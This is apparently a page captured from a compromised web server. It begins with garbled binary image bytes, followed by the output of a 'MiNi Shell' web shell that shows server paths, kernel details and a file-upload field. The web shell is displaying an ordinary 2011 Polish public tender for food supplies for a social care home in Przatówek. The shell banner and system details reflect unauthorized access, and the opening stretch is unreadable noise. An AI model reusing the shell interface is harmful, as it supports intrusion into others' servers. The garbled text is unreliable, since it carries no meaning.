JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111207/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111207/323243-N-2011.html

<p class="kh_header"><b>Szadek: Zakup i dostawę artykułów spożywczych dla Domu Pomocy Społecznej w Przatówku,
Przatówek 1, 98-240 Szadek</b><br>
<b>Numer ogłoszenia: 323243 - 2011; data zamieszczenia: 07.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , Przatówek 1, 98-240 Szadek, woj. łódzkie, tel. 43 675 12 29, faks 43 675 12 29.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna powiatu.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawę artykułów spożywczych dla Domu Pomocy Społecznej w Przatówku,
Przatówek 1, 98-240 Szadek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zamówienie dotyczy:
Zakupu i dostawy artykułów spożywczych dla Domu Pomocy Społecznej w Przatówku Przatówek 1, 98-240 Szadek.
Oznaczenie zadania za pomocą Wspólnego Słownika Zamówień (CPV): 
			- 03100000-2 Produkty rolnictwa i ogrodnictwa
			- 15400000-2 Oleje i tłuszcze zwierzęce lub roślinne
			- 15300000-1 Owoce, warzywa i podobne produkty
			- 15600000-4 Produkty przemiału ziarna, skrobi i produktów skrobiowych 
			- 15800000-6 Różne produkty spożywcze 
			- 15200000-0 Ryby przetworzone i konserwowane 

2. Artykuły spożywcze, stanowiące przedmiot zamówienia muszą w pochodzić z bieżącej produkcji oraz utrzymywać ustalone standardy jakościowe.
3. Zamawiający może zmniejszyć ilość oraz zakres zamawianego asortymentu w zależności od rzeczywistego zapotrzebowania, w ilości nie przekraczającej jednak 20% wartości podanych                 w tabeli pkt 8.
4. Pracownik Domu Pomocy Społecznej w Przatówku odpowiedzialny za składanie zamówień, zamawia określone ilości asortymentu. Zamówienie składane jest w formie pisemnej i przesyłane do realizującego faksem, pocztą elektroniczną. W uzasadnionych przypadkach dopuszcza się możliwość stosowania zamówienia telefonicznego.
5. Wykonawca dowozi zamówiony towar do siedziby zamawiającego swoim środkiem transportu    w ciągu maksymalnie dwóch dni roboczych, liczonych od dnia złożenia zamówienia w godzinach od: 700 - 1300.
6. Płatności za zamówiony towar dokonuje się w formie przelewu w terminie 14 dni po otrzymaniu faktury.
7. Wybór Wykonawcy nastąpi po zapoznaniu się z dokumentacją przetargową oferentów.
8. W wyborze oferty istotną będzie cena na wyszczególnione w poniższej tabeli artykuły:

L.P.
Nazwa artykułu
Szacunkowe zapotrzebowanie na artykuł w okresie trwania umowy
    1.
Ananasy puszka 
2,28 kg
    2.
Aromaty do ciasta 10ml
78 szt
    3.
Barszcz biały 
90 litrów
    4.
Biszkopty okrągłe 
40 kg
    5.
Brzoskwinie puszka      
5,1 kg
    6.
Budynie 
73 kg
    7.
Bułka tarta 
110 kg
    8.
Chrzan 
5 kg
    9.
Ciastka herbatniki 
12 kg
  10.
Ciastka luzem
85 kg
  11.
Cukier 
1900 kg
  12.
Cukier puder 
30 kg
  13.
Cukier waniliowy
10 kg
  14.
Cukierki czekoladowe luzem
85 kg
  15.
Cynamon 
1,20 kg
  16.
Drożdże 
20 kg
  17.
Dżem brzoskwiniowy 
63 kg
  18.
Dżem truskawkowy 
135 kg
  19.
Dżem wiśniowy 
134 kg
  20.
Dżem z czarnej porzeczki 
67 kg
  21.
Galaretki owocowe
70 kg
  22.
Groch łupany 
70 kg
  23.
Groszek konserwowy 
60 kg
  24.
Herbata expresowa
0,3 kg
  25.
Herbata granulowana
42 kg
  26.
Jagły 
1 kg
  27.
Jajka - wielkość L
19000 szt.
  28.
Kakao 
6 kg
  29.
Kasza gryczana
50 kg
  30.
Kasza jęczmienna
100 kg
  31.
Kasza manna 
80 kg
  32.
Kawa naturalna mielona
1,5 kg
  33.
Kawa rozpuszczalna zbożowa
95 kg
  34.
Ketchup łagodny 
53 kg
  35.
Kisiel 
54 kg
  36
Kleik ryżowy
12 kg
  37
Kompot wiśniowy 0,9l
1520 szt.
  38.
Koncentrat pomidorowy 
137 kg
  39
Krakersy 
52 kg
  40.
Kukurydza konserwowa 
2,4 kg
  41.
Kwasek cytrynowy
3 kg
  42.
Liście laurowe
1kg
  43.
Majeranek 
5 kg
  44.
Majonez 
72 kg
  45.
Mak 
64 kg
  46.
Makaron nitki
100 kg
  47.
Makaron świderki
400 kg
  48.
Margaryna Kasia lub równoważna
2 kg
  49.
Margaryna palma 
30 kg
  50.
Margaryna zwykła 
15 kg
  51.
Marmolada 
4 kg
  52.
Masło roślinne 
20 kg
  53.
Mąka pszenna - typ 500
1240 kg
  54.
Mąka ziemniaczana
46 kg
  55.
Migdały płatki 
0,2 kg
  56.
Miód sztuczny 
4 kg
  57.
Mleko pełne w proszku 
142 kg
  58.
Mleko skondensowane
2 kg
  59.
Musztarda 
32 kg
  60.
Nać pietruszki suszona
0,5 kg
  61.
Ocet
45 litry
  62.
Ogórki konserwowe 0,9l
3 szt.
  63.
Olej rzepakowy
173 litry
  64.
Orzechy włoskie
0,8 kg
  65.
Paluszki słone
43 kg
  66.
Papryka konserwowa 0,9l
100 szt.
  67.
Papryka mielona ostra
0,5 kg
  68.
Papryka mielona słodka
2 kg
  69.
Paprykarz szczeciński 
51 kg
  70.
Pieprz mielony
5 kg
  71.
Pieprz ziarnisty
2 kg
  72.
Pierogi z kapustą i grzybami
5 kg
  73.
Płatki kukurydziane
10 kg
  74.
Płatki owsiane 
40 kg
  75.
Proszek do pieczenia
1 kg
  76.
Przecier ogórkowy
30 kg
  77.
Przecier szczawiowy
25 kg
  78.
Przyprawa do bigosu
0,5 kg
  79.
Przyprawa do flaków
1 kg
  80.
Przyprawa do kiszonych ogórków
3,5 kg
  81.
Przyprawa do kurczaka
1 kg
  82.
Przyprawa grilowa
0,24 kg
  83.
Przyprawa w płynie
75 litry
  84.
Przyprawa warzywna
27kg
  85.
Rodzynki
6,5 kg
  86.
Ryż 
200 kg
  87.
Serki topione 
20 kg
  88.
Smalec 
65 kg
  89.
Soda spożywcza 
2 kg
  90.
Sól jodowana
366 kg
  91.
Suchary delikatesowe
65 kg
  92.
Susz owocowy 
2 kg
  93.
Syrop malinowy 
90 litrów
  94.
Ryba w pomidorach 
183 kg
  95.
Śmietanka fix 
1,1 kg
  96.
Tuńczyk w sosie własnym
0,6 kg
  97.
Wafle luzem
105 kg
 98.
Wiórki kokosowe 
1,5 kg
 99.
Ziele angielskie 
1,60kg
100.
Żelatyna spożywcza 
4 kg.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1, 15.40.00.00-2, 15.80.00.00-6, 15.20.00.00-0, 03.10.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia ubiegać się mogą Wykonawcy spełniający warunki określone           w art. 22 ust. 1 ustawy PZP a więc:
posiadają uprawnienia do wykonywania określonej działalności lub czynności:
posiadają odpowiednią wiedzę i doświadczenie do wykonania zamówienia:
dysponują odpowiednim potencjałem technicznym:
są w odpowiedniej sytuacji ekonomicznej i finansowej:
2.O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na mocy przepisów art. 24 ust. 1 i 2 ustawy PZP.
3.Zamawiający oceni pozytywnie spełnienie warunków, jeżeli:
Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy PZP
Wykonawca złoży oświadczenie o braku podstaw do wykluczenia z postępowania                       o udzielenie zamówienia publicznego określonych w art. 24 ust. 1 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia ubiegać się mogą Wykonawcy spełniający warunki określone           w art. 22 ust. 1 ustawy PZP a więc:
posiadają uprawnienia do wykonywania określonej działalności lub czynności:
posiadają odpowiednią wiedzę i doświadczenie do wykonania zamówienia:
dysponują odpowiednim potencjałem technicznym:
są w odpowiedniej sytuacji ekonomicznej i finansowej:
2.O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na mocy przepisów art. 24 ust. 1 i 2 ustawy PZP.
3.Zamawiający oceni pozytywnie spełnienie warunków, jeżeli:
Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy PZP
Wykonawca złoży oświadczenie o braku podstaw do wykluczenia z postępowania                       o udzielenie zamówienia publicznego określonych w art. 24 ust. 1 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia ubiegać się mogą Wykonawcy spełniający warunki określone           w art. 22 ust. 1 ustawy PZP a więc:
posiadają uprawnienia do wykonywania określonej działalności lub czynności:
posiadają odpowiednią wiedzę i doświadczenie do wykonania zamówienia:
dysponują odpowiednim potencjałem technicznym:
są w odpowiedniej sytuacji ekonomicznej i finansowej:
2.O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na mocy przepisów art. 24 ust. 1 i 2 ustawy PZP.
3.Zamawiający oceni pozytywnie spełnienie warunków, jeżeli:
Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy PZP
Wykonawca złoży oświadczenie o braku podstaw do wykluczenia z postępowania                       o udzielenie zamówienia publicznego określonych w art. 24 ust. 1 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia ubiegać się mogą Wykonawcy spełniający warunki określone           w art. 22 ust. 1 ustawy PZP a więc:
posiadają uprawnienia do wykonywania określonej działalności lub czynności:
posiadają odpowiednią wiedzę i doświadczenie do wykonania zamówienia:
dysponują odpowiednim potencjałem technicznym:
są w odpowiedniej sytuacji ekonomicznej i finansowej:
2.O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na mocy przepisów art. 24 ust. 1 i 2 ustawy PZP.
3.Zamawiający oceni pozytywnie spełnienie warunków, jeżeli:
Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy PZP
Wykonawca złoży oświadczenie o braku podstaw do wykluczenia z postępowania                       o udzielenie zamówienia publicznego określonych w art. 24 ust. 1 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia ubiegać się mogą Wykonawcy spełniający warunki określone           w art. 22 ust. 1 ustawy PZP a więc:
posiadają uprawnienia do wykonywania określonej działalności lub czynności:
posiadają odpowiednią wiedzę i doświadczenie do wykonania zamówienia:
dysponują odpowiednim potencjałem technicznym:
są w odpowiedniej sytuacji ekonomicznej i finansowej:
2.O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na mocy przepisów art. 24 ust. 1 i 2 ustawy PZP.
3.Zamawiający oceni pozytywnie spełnienie warunków, jeżeli:
Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy PZP
Wykonawca złoży oświadczenie o braku podstaw do wykluczenia z postępowania                       o udzielenie zamówienia publicznego określonych w art. 24 ust. 1 ustawy PZP</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Przewiduje się możliwość zmiany istotnych postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru zgodnie z warunkami:
            a) w zakresie zmiany wynagrodzenia (ceny podanej w ofercie) w przypadku zmiany
             stawek podatku VAT;
b) w zakresie zmiany ilości asortymentu będącego przedmiotem zamówienia (zakresu zamówienia) w przypadku konieczności zmniejszenia ilości zamawianego asortymentu, stosownie do potrzeb, jednak nie więcej niż 20% wartości wymienionych w tabeli Formularza cenowego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.powiatzdunskowolski.pl/bip/index.php?option=com_content&task=view&id=89&Itemid=156<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Przatówku
Przatówek 1
98-240 Szadek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2011 godzina 08:30, miejsce: Oferty należy składać w siedzibie Zamawiającego w sekretariacie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 10 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com